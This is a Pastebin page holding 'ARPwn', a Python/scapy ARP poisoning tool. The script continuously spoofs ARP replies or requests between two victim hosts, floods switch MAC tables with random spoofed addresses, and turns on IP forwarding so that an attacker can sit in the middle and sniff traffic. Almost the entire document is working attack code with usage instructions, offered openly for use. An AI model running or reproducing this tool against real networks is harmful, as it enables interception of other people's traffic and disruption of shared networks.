Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #
- # ARPwn v0.2 (2013)
- # Muffin's ARP Poisoning Tool
- #
- # This tool can poison the ARP tables of two targets with
- # either ARP replies OR ARP requests. It can also flood the ARP
- # table of a single machine or a whole subnet( $10,000 switch = $10 hub )
- #
- #Usage:
- #
- # Enable ip forwarding with "./arpwn -f 1", where 1 is ON and 0 is OFF
- #
- #Two way ARP poisoning:
- #
- # "./arpwn -flag delay target_ip1 target_ip2", where -flag = -r or -q
- #
- # -r is for ARP replies and -q is for ARP requests
- #
- # delay is an integer
- #
- # Now you can open your sniffing software and capture.
- #
- #MAC Flooding:
- #
- # "./arpwn -m Target_MAC SRC_IP
- #
- # IMPORTANT: SRC_IP is a spoofed source ip of the form W X Y Z
- # where W X Y Z are integers 0-255 or rand
- #
- # Example: "./arpwn -m ff:ff:ff:ff:ff:ff 10 rand 0 rand
- #
- # Here rand will cause the program to generate a random integer
- # 0-255. So this example might generate the first ip as
- #
- # 10.32.0.125, or 10.15.0.12, or any other ip of that form.
- #
- # NOTE: If using rand, each new ARP packet will mostly
- # have a different ip, of course there will be repeats at some point.
- #
- # Questions? Email me at gotnerdy@gmail.com
- from scapy.all import *
- import sys
- import time
- import os
- try:
- if sys.argv[1] == "-r" :
- delay = int(sys.argv[2])
- victim1 = sys.argv[3]
- victim2 = sys.argv[4]
- #mac = sys.argv[3]
- a = ARP()
- a.op = 2
- #a.hwdst = mac
- print ""
- print "ARPwn v0.2 (2013)"
- print "Muffins' ARP Poisoning Tool"
- print ""
- print "ARP Reply Mode"
- print "Victim 1: "+victim1
- print "Victim 2: "+victim2
- print "Continuous Delay: "+str(delay)+" second(s)"
- print ""
- print "Ctrl-C to quit"
- try:
- while 1:
- a.psrc = sys.argv[3]
- a.pdst = sys.argv[4]
- send(a,verbose = 0)
- a.psrc = sys.argv[4]
- a.pdst = sys.argv[3]
- send(a,verbose = 0)
- time.sleep(delay)
- except:
- sys.exit(0)
- elif sys.argv[1] == "-q":
- delay = int(sys.argv[2])
- victim1 = sys.argv[3]
- victim2 = sys.argv[4]
- a = ARP()
- a.op = 1
- print ""
- print "ARPwn v0.2 (2013)"
- print "Muffins' ARP Poisoning Tool"
- print ""
- print "ARP Request Mode"
- print "Victim 1: "+victim1
- print "Victim 2: "+victim2
- print "Continuous Delay: "+str(delay)+" second(s)"
- print ""
- print "Ctrl-C to quit"
- try:
- while 1:
- a.psrc = sys.argv[3]
- a.pdst = sys.argv[4]
- send(a,verbose = 0)
- a.psrc = sys.argv[4]
- a.pdst = sys.argv[3]
- send(a,verbose = 0)
- time.sleep(delay)
- except:
- sys.exit(0)
- elif sys.argv[1] == "-m":
- try:
- e = Ether()
- a = ARP()
- a.op = 2
- e.dst = sys.argv[2]
- e.hwdst = sys.argv[2]
- print ""
- print "ARPwn v0.2 (2013)"
- print "Muffins' ARP Poisoning Tool"
- print ""
- print "MAC Flooding "+str(sys.argv[2])
- print ""
- print "Ctrl-C to quit"
- while 1:
- src_mac = RandMAC()
- e.src = src_mac
- a.hwsrc = src_mac
- if sys.argv[3] == "rand":
- result = str(random.randint(0,255))
- else:
- result = str(sys.argv[3])
- for t in range(4,7):
- if sys.argv[t] == "rand":
- result = result+"."+str(random.randint(0,255))
- else:
- result = result+"."+sys.argv[t]
- a.psrc = result
- sendp(e/a,verbose = 0)
- except:
- sys.exit(0)
- elif sys.argv[1] == "-f":
- try:
- if int(sys.argv[2]) == 0:
- os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
- print "IP Forwarding is now OFF"
- elif int(sys.argv[2]) == 1:
- os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
- print "IP Forwarding is now ON"
- except:
- sys.exit(0)
- else:
- pass
- except:
- print ""
- print "You have done something wrong."
- print ""
- print "Usage:"
- print " For two-way arp poisoning"
- print " ./arpwn -type delay target_ip1 target_ip2"
- print " where -type is r for ARP replay"
- print " where -type is q for ARP request"
- print ""
- print " ex: ./arpwn -r 10 192.168.1.23 192.168.1.1"
- print ""
- print " For mac flood"
- print " ./arpwn -m DST_MAC SPOOF_IP"
- print " where DST is the destination mac"
- print " where SPOOF_IP is 0-225 or rand "
- print ""
- print " ex: ./arpwn -m ff:ff:ff:ff:ff:ff 192 168 1 rand"
- print ""
- else:
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement